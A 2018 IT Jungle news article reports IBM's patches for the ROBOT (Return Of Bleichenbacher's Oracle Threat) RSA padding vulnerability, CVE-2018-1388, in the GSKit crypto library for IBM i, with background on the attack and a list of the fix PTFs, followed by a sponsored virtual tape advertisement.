• The Four Hundred
  • Subscribe
  • Media Kit
  • Contributors
  • About Us
  • Contact
Menu
  • The Four Hundred
  • Subscribe
  • Media Kit
  • Contributors
  • About Us
  • Contact
  • IBM Patches ‘ROBOT’ Flaw in IBM i Crypto Library

    February 21, 2018 Alex Woodie

    IBM has issued patches to fix a serious security problem in the IBM Global Security Kit, or GSKit, a relatively obscure crypto package that implements SSL/TLS encryption algorithms across a variety of IBM products, including IBM i. An old flaw in the underlying RSA crypto algorithm that could let hackers decrypt data in a “side channel” attack has resurfaced under a new moniker: “ROBOT.”

    GSKit is an IBM toolkit that implements various encryption-related functions, including symmetric and asymmetric ciphers, random number generation, hashing algorithms, and encryption key management capabilities, for products that need over-the-wire encryption, including IBM i, Linux, and AIX operating systems, and WebSphere MQ, WebSphere Application Server, Db2 database, and Tivoli middleware. In addition to providing a crypto library, it provides command-line tools for implementing SSL/TLS encryption.

    One of the components of GSKit is PKCS#1, the first family of Public-Key Cryptography Standards published by RSA Laboratories, which defines and implements the basic definitions and mathematical properties for public-key cryptography. Because the RSA algorithms cannot be securely implemented as they were originally written, “padding” must be added so they fill the block. This PKCS padding included so-called “oracles” designed to make the implementation more secure.

    The whole GSKit package, including PKCS padding, is FIPS 140-2 certified, giving customers the confidence to use it. However, serious problems have been discovered in that PKCS padding.

    Back in 1998, a security researcher named Daniel Bleichenbacher discovered that he could gain access to data that was encrypted with Secure Sockets Layer (SSL), which at the time was the industry standard for encrypting a stream of data on a network. Bleichenbacher found that by using the error messages generated by the SSL server itself, he could launch an “adaptive-chosen ciphertext” attack to crack it.

    The practical implementation of the flaw allowed an attacker to passively record traffic and decrypt it later, what’s called a “side-channel” attack. The attackers would do this by using invalid PKCS padding and then analyzing the TLS error messages that come off of it, which would allow them to figure out the private RSA key that decrypts data.

    However, instead of fixing the side-channel problem in a straightforward fashion, the designers of SSL decided to build add-ons that were basically workarounds. The counter-measures added to PKCS#1 became part of Transport Layer Security (TLS), the follow-on to SSL that was first described in 1999, and which is today a standard method for protecting data passed across HTTP, FTP, and other Internet protocols.

    While stronger versions of PKCS padding have been devised and implemented as PKCS#1 version 2.2, they’re not in widespread use. That leaves organizations to use the older standard, but the increasingly complex workarounds required to secure it left some RSA implementations exposed.

    In December, a group of security researchers discovered that, by using a variation of Bleichenbacher’s technique, they could hack the contents of modern HTTPS servers that were using the latest TLS standard. Hanno Böck, Juraj Somorovsky, and Craig Young called it Return Of Bleichenbacher’s Oracle Threat, or ROBOT.

    “Some of the most popular webpages on the Internet were affected, including Facebook and Paypal,” the researchers wrote on their website, called The ROBOT Attack. “In total, we found vulnerable subdomains on 27 of the top 100 domains as ranked by Alexa.”

    The researchers also identified a handful of hardware and software vendors whose implementations of PKCS#1 make their customers vulnerable to side-channel attacks. In addition to IBM, impacted vendors listed on the ROBOT Attack website include Citrix Systems, F5 Networks, Cisco Systems, and Palo Alto Networks, among others.

    On February 1, the IBM GSKit security vulnerability was given a Common Vulnerabilities and Exposures number CVE-2018-1388. Owing to the high potential for damage to the confidentiality and integrity of data, and the low attack complexity associated with potential exploits, CVE gave the flaw a CVSS base score of 9.1, which is very high.

    According to this security bulletin that was published on January 15, IBM had issued PTFs that address the flaw in IBM i 7.1, 7.2, and 7.3. On February 6, IBM issued a security bulletin alerting IBM i users to the flaw and telling them about the availability of the patches. Three days later, it published a post on the Product Security Incident Response (PSIRT) blog alerting users to the security bulletin and the patches.

    All three supported versions of IBM i are affected. IBM recommends that IBM i customers immediately apply the following PTFs to fix the ROBOT flaw:

    IBM i 7.1 — MF64537
    IBM i 7.2 — MF64536
    IBM i 7.3 — MF64534

    In its APAR for the ROBOT attack published in January, IBM says every release of the IBM i operating system going back to i5/OS V5R1 is impacted by the ROBOT vulnerability in GSKit. However, IBM did not issue any patches for the older OSes. The only way to protect against the ROBOT vulnerability is to stop using the RSA ciphers, which is something that it recommends users of IBM 7.2 and 7.3 do anyway.

    In addition to patching IBM i, IBM patched several releases of WebSphere MQ to address the GSKit vulnerabilities.

    RELATED STORIES

    IBM i Gets More PTFs for Meltdown and Spectre

    Evaluating Your IBM i Encryption Options

    Vulnerabilities In 3DES Encryption Put It Out To Pasture In IBM i

    Big Blue Patches 14 More OpenSSL Flaws In IBM i

    IBM Blocks ‘Bar Mitzvah’ Attack In SSL/TLS

    IBM Issues More POODLE Patches, Warns Not to Use SSLv3

    Heartbleed Postmortem: Time to Rethink Open Source Security?

    Heartbleed, OpenSSL, and IBM i: What You Need to Know

    Share this:

    • Reddit
    • Facebook
    • LinkedIn
    • Twitter
    • Email

    Tags: Tags: AIX, APAR, Common Vulnerabilities and Exposures, CVE, DB2, GSKit, i5/OS V5R1, IBM Global Security Kit, IBM i, Linux, ROBOT, SSL, TLS, Transport Layer Security, WebSphere Application Server, WebSphere MQ

    Sponsored by
    LaserVault

    Integrate Virtual Tape to Automate Your Backups And Strengthen Your Ability To Recover From Cyber Attacks And Disasters

    With most IT departments stretched thin, finding something that can quickly free up IT time is definitely a bonus. That’s why it’s important to stop and take a look at integrating virtual tape into your backup and recovery. Virtual tape is one of those technologies where once you have it, you’ll wonder why you didn’t do it sooner. See a demo and get a $50 gift card.

    But what is it about using virtual tape that makes it so worthwhile? Why is it that so many IBM i shops are already using or considering using virtual tape for all or part of their backup and recovery systems?

    Virtual tape and virtual tape libraries offer a way to both simplify and strengthen backup and recovery operations. By incorporating virtual tape technology, automation of backups becomes possible resulting in hundreds of hours saved annually for IT departments and personnel.

    “We needed to find a replacement that would lower the maintenance cost and reduce complexity of our backup and recovery functions without a major disruption to our operations.” David Fray, Director of Enterprise Systems, ABC Financial

    LaserVault ViTL is a virtual tape and tape library solution developed specifically for use with IBM Power Systems (from AS/400 to iSeries to Power 9s). With ViTL you can:

    • Replace physical tape and tape libraries and eliminate associated delays
    • Automate backup operations, including the ability to purge or archive backups
    • Remotely manage your backups – no need to be onsite with your server
    • Save backups to a dedupe appliance and the cloud
    • Recover your data at lightspeed greatly improving your ability to recover from cyberattacks
    • And so much more

    Sign-up now to see a ViTL online demo and get a $50 Amazon e-gift card when the demo is complete as our way of saying thanks for your time. Plus when you sign-up you’ll receive a free facts comparison sheet on using virtual tape vs tape so you can compare the functionality for yourself.

    Share this:

    • Reddit
    • Facebook
    • LinkedIn
    • Twitter
    • Email

    Four Hundred Monitor, February 21 BRMS Cloud Backups Get Recovery Teeth

    Leave a Reply Cancel reply

TFH Volume: 28 Issue: 14

This Issue Sponsored By

  • Rocket Software
  • UCG TECHNOLOGIES
  • Harkins & Associates
  • Manta Technologies
  • WorksRight Software

Table of Contents

  • Tooling Around With IBM i Access Client Solutions Announcements
  • BRMS Cloud Backups Get Recovery Teeth
  • IBM Patches ‘ROBOT’ Flaw in IBM i Crypto Library
  • Four Hundred Monitor, February 21
  • IBM i PTF Guide, Volume 20, Number 7

Content archive

  • The Four Hundred
  • Four Hundred Stuff
  • Four Hundred Guru

Recent Posts

  • IBM Mulls Using DataMigrator as Cloud Warehouse Pipeline
  • PowerTech AV Automatically Detects Ransomware Activity
  • Infor Puts CM3 Project On Hold
  • Four Hundred Monitor, June 29
  • IBM i PTF Guide, Volume 24, Number 26
  • Guild Mortgage Takes The 20-Year Option For Modernization
  • IBM i Licensing, Part 3: Can The Hardware Bundle Be Cheaper Than A Smartphone?
  • Guru: The Finer Points of Exit Points
  • Big Blue Tweaks IBM i Pricing Ahead Of Subscription Model
  • We Still Want IBM i On The Impending Power E1050

Subscribe

To get news from IT Jungle sent to your inbox every week, subscribe to our newsletter.

Pages

  • About Us
  • Contact
  • Contributors
  • Four Hundred Monitor
  • IBM i PTF Guide
  • Media Kit
  • Subscribe

Search

Copyright © 2022 IT Jungle

loading Cancel
Post was not sent - check your email addresses!
Email check failed, please try again
Sorry, your blog cannot share posts by email.